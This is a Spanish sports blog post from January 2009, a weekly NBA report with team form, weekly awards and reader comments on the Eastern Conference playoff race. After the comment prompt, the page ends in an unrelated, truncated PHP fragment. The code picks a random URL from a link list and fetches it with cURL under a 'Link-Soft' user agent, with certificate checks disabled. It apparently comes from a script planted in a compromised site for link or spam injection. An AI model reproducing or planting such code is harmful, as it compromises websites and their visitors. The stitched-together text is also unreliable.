Informe Semanal TJNBA (Semana 10)

05 de January de 2009 por TheDeerHunter

por TheDeerHunter & MagicJohnson32

La última ha sido una semana de sobresaltos, sobre todo en la cabeza del Este. Si hace pocos días nos extrañábamos de la debacle simultánea de varios candidatos al Anillo, anoche el batacazo fue todavía más gordo. Y pudo ser peor, porque Detroit se libró por el canto de un duro. Ni partidazos titánicos de Dwight Howard, LeBron y Pierce libraron a sus equipos del ridículo más espantoso.

stuckeyON FIRE:

No sin cierta dosis de buena suerte y con un calendario relativamente cómodo, el equipo de la semana han sido los Pistons. Y lo han sido sin Hamilton, sin Rasheed, con Iverson disparando a todo lo que se mueve y no con especial acierto pero con Prince y Stuckey mostrando galones. Su mejor semana ha coincidido con la peor de sus rivales directos, y eso les permite volver a meterse en la pomada.

De forma similar, los Suns también han agradecido una semana fácil ganando todos sus partidos. En su caso, eso sí, disfrutando de la mejor versión de Shaquille en mucho tiempo en la semana que ha batido la marca histórica anotadora de Oscar Robertson. Pronto hará lo propio con la de Olajuwon y podrá quedarse como 7º máximo anotador de todos los tiempos esta misma temporada. Habrá que celebrarlo.

Los Lakers, tras el desplome de los gallos del Este, pasa a ser el nuevo líder de la competición. Esta semana sólo han jugado dos partidos, pero han ganado sobradamente a dos difíciles rivales aunque con bajas importantes, Utah (sin Boozer) y Portland (sin Roy).

Miami, Atlanta y Denver también se han mostrado en gran estado de forma, si bien todos han llegado a perder un partido.

Hay que destacar la gran semana de los Timberwolves. Tres victorias como tres soles que no las veían ni los más viejos del lugar. Eso sí, los rivales tampoco es que fuesen favoritos para el anillo.

kgqrichAL TRAN-TRAN:

Los Celtics llevan la sorprendente marca de 2 victorias por 4 derrotas en las últimas dos semanas. Cuando hablábamos de levantar ligeramente el pie del acelerador no pensábamos en humillaciones como la de Oackland o la del Madison. Curiosamente, tanto Cleveland como Orlando se han contagiado del tono irregular de los de Boston y el liderato del Este parece más abierto que nunca.

En el Oeste tampoco están para tirar cohetes, pero al menos los Hornets, Spurs y Mavericks se han mantenido por encima del 50% de victorias/derrotas.

AL BORDE DEL ABISMO:

La batalla ahora mismo por la última plaza del Este va desde Milwaukee, con 19 derrotas, hasta Charlotte con 22. Entre medio tenemos a los Knicks también con 19, a Toronto, Philadelphia y Chicago con 20, y a Indiana con 21. Podríamos incluir también a Washington si no recuperan a Arenas a tiempo.

rocketbenchEl caso es que ninguno de ellos se ha mostrado especialmente fino esta semana. Abrimos oficialmente la porra de quien quedará en la 8ª posición después de enero. Queremos apostar por Calderón y sus Raptors, que lo de ir al All-Star lo tiene bastante negro.

En el Oeste la batalla se libra entre Houston, Portland y Utah. Tal y como andan de salud los pobres Rockets es difícil apostar por ellos.

EL POZO:

Lo copan por completo los colistas del Oeste. Grizzlies, Warriors, Kings y Thunder… Mención especial para los Clippers, el único equipo de toda la competición que no ha obtenido ni una sola victoria esta semana.  Y ya saben lo del perro y las pulgas: Baron Davis, Zach Randolph y Chris Kaman se perderán las próximas dos semanas de competición. Están que lo tiran.

kobebatumPREMIOS SEMANALES

MVP: El premio al mejor jugador semanal viene marcado por el ascenso de los Lakers a la cima de la liga. Kobe, además, nos lo pone fácil con unas cifras de escándalo al anotar 97 puntos en menos de 103 minutos con algo más de un 57% de acierto en tiros de campo.

El rookie: Con Rose y Mayo haciendo sus partidos más discretos, Eric Gordon se abre paso en los Clippers a golpe de talento y puntos. Su semana ha sido sensacional con más de 24 por partido. Eso sí, su equipo no gana ni a la de tres.

La sorpresa: El premio es para Jarrett Jack, titular por la lesión de TJ Ford y que ha firmado más de 21 puntos de media con porcentajes superiores al 60%, además de 4 rebotes y 3.3 asistencias.

La decepción: Los últimos días han sido especialmente malos para los Celtics y Garnett. KG ha firmado esta última semana tres actuaciones discretísimas, coronadas por su 1 de 6 en tiros de ayer en la derrota en pista de los Knicks.

CONCLUSIONES:

– En nuestra sección semanal “Así de baratos están los Playoffs en el Este, y así de caros en el Oeste”, los Bucks son octavos con 16 victorias y 19 derrotas mientras que los Jazz son novenos con 19 partidos ganados por 15 perdidos.

jcaldetirolibre– Y en nuestra sección semanal “Rachas que permanecen intactas”, los Cavs siguen sin perder en casa (suman 17 victorias) y Calderón sigue sin fallar un tiro libre (y van 72). Por cierto, el base extremeño, que se perderá un par de partidos por una lesión en un tendón, lidera a su equipo en todos los porcentajes de tiro (tiros de campo, triples y libres).

– Interesante reflexión la que nos proporcionó Dwight Howard anoche, tras la derrota de su equipo ante los Raptors. Howard igualó su mejor marca anotadora con 39 puntos y un extraordinario 14 de 19 en tiros de campo. Sin embargo, el pívot se culpó de la derrota por no “estar ahí defensivamente como debía” para atrapar más rebotes o colocar más tapones.

– Los Lakers vuelven a liderar la NBA. Ayer explicó Phil Jackson que Gary Vitty, el preparador físico, ha colgado en la pared del vestuario la clasificación de ambas conferencias. Sin rivales en el Oeste, todas las miras están puestas en obtener el mejor balance de la liga. Nos quedan dudas sobre la dureza mental del equipo, sobre el rendimiento de Odom y Bynum, sobre la capacidad de Derek Fisher de mantener el nivel jugando casi 40 minutos por partido ante la baja de Farmar… Kobe dice que aún va en “tercera” marcha. Y pese a que van líderes con un gran balance, la impresión es esa, que los Lakers pueden dar más de sí. Este mes podrán demostrarlo con compromisos ante Hornets, Rockets, Spurs, Cavs o Magic, entre otros.

– Antes de la pregunta de la semana, veamos un momento para la historia: la señalización de unos pasos a LeBron James. Sinceramente, le hemos visto darse paseos mucho más evidentes que éstos.

Y la pregunta de la semana es… con Celtics, Cavs, Magic, Pistons, Hawks y Heat asentados en los primeros puestos del Este, ¿qué otros dos equipos completarán los Playoffs por dicha conferencia?

Comenta

8 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Joer mas lesionados no podemos tener, el base titular el base reserva el 3er base, el alapivot y el pivot titulares, y vaya partidazo k hacemos ayer en el staples… menos mal k no esta brand.

      Citar

  2. smoove dice:
    #2

    No se como pitan estos pasos de James y otros días no dicen nada cuando da 4 y bien largos para entrar a canasta a lo bestia.Que grande es Howard,siempre exigiendose mas y sin esconderse.Si los Clippers hubiesen ganado un par de encuentros esta semana daría el MVP de la semana a Camby y sus 20 rebotes por partido.Yo en el este apuesto por Boston-Cleveland-Orlando-Detroit-Atlanta-Miami-Philadelphia-Toronto.A New Jersey le podrá la juventud y la motivación de Carter(como cojan una mala racha Vince pide el traspaso como en Toronto…)y a Milwaukee les puede el entrenador,vaya elemento que prefiere a Malik Allen a Villanueva y a Ridnour antes que a Sessions…que se vaya a su casa el Skilles este,y gente quejandose cuando le echaron de los Bulls…

      Citar

  3. Txusma dice:
    #3

    Por preferencias me quedaría con Bulls y Raptors aunque veo a los Bucks lo mas finos de todo ese grupo perseguidor, no se porque.

      Citar

  4. MagicJohnson32 dice:
    #4

    Eso pensaba yo, que a los Clippers se les lesiona hasta Brand xD En serio, qué mala suerte en un año que podría ser muy bonito para el equipo.

    En el Este, Raptors y Sixers han de meterse en Playoffs sí o sí. Aunque claro, los Pacers con Dunleavy o los Wizards con Arenas están a tiempo de dar guerra.

      Citar

  5. Jabho dice:
    #5

    Bueno, el momento para aflojar un poco la marcha es justo ahora, antes del All Star. Creo que visto lo visto no hay mucho por lo que preocuparse en el caso de Boston o Cavs como no lo hubo en la “crisis” de Lakers. En primavera estarán bien seguro.

    Del grupo de perseguidores creo que Sixers es el mejor de largo. Es que como no entren es fracaso total, y si entran y no dan ni guerra casi también…. Personalmente me gustaría Nets o Pacers, pero Bucks está mas fino como dice Txus. Los Bulls no me inspiran nada. Creo que de largo el equipo al que mas le convendría un movimiento y hacerse con un interior decente (Brad Miller puede ser asequible y disponible). Toronto no sé, no lo veo tampoco. Si carbura Jermaine son otros que tienen equipo sin duda, pero entre que arranca y se lesiona…

      Citar

  6. Couxe dice:
    #6

    Aunque de aquí a los play off queda mucho camino por delante, yo diría que salvo ecatombe, Celtics, Cavs, Magic, Hawks y Pistons estarán seguro.
    En cuanto a los Heat, aunque lleven una buena ventaja sobre el siguiente, todavía no lo veo muy claro, ya que me parece un equipo que está rindiendo casi al máximo de sus posibilidades, y alguna lesión o un bajón en el juego de Wade podría lastrarlos muchísimo…
    Luego quedarían dos plazas que a buen seguro estarán muy competidas. Sixers, Raptors y Bulls están fuera, pero tienen un enorme margen de mejora y es muy posible que alguno se meta o ronde los play off de aquí a final de temporada. A los Bucks no los veo aguantando ahí hasta el final, y los Nets son una incógnita, y casi los veo con más posibilidades de empeorar que de mejorar… Pero bueno, queda un mundo todavía…

      Citar

  7. Dantley dice:
    #7

    Yo apuesto por Raptors y Sixers.

    je, je, ese LeBron y sus pasos tipo fútbol australiano ¡¡¡

    PD: Qué bueno es Stuckey

      Citar

  8. TheDeerHunter dice:
    #8

    Creo que para completar el análisis, también deberíamos haber nombrado nuestros premios del mes de Diciembre.

    Para el premio de MVP, la NBA ya nombró por un lado a Wade y por otro a Kobe… y nosotros no podemos estar más de acuerdo. Si nos tenemos que quedar con uno, yo creo que en este caso no hay discusión y los números de Wade son superiores en todos los aspectos. La marca de 9 victorias 4 derrotas con el equipo que tiene dice el resto.

    Para el de RoY, la NBA nombró a Rose y Westbrook. Nosotros también pondríamos encima de la mesa a Mayo y Brook. Pero es que mientras a los demás se les nota un cierto bajoncillo físico, Westbrook parece estar cada día más fuerte.

    La NBA no tiene premios de sopresa/decepción propiamente dichos. Para el de sorpresa, yo me quedaría este mes con Jameer Nelson, que se salió durante buena parte del mes y lidera uno de los equipos más enforma. Para la decepción creo que estaremos de acuerdo todos en Baron Davis.
    ¿qué pensáis vosotros de todo esto??

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>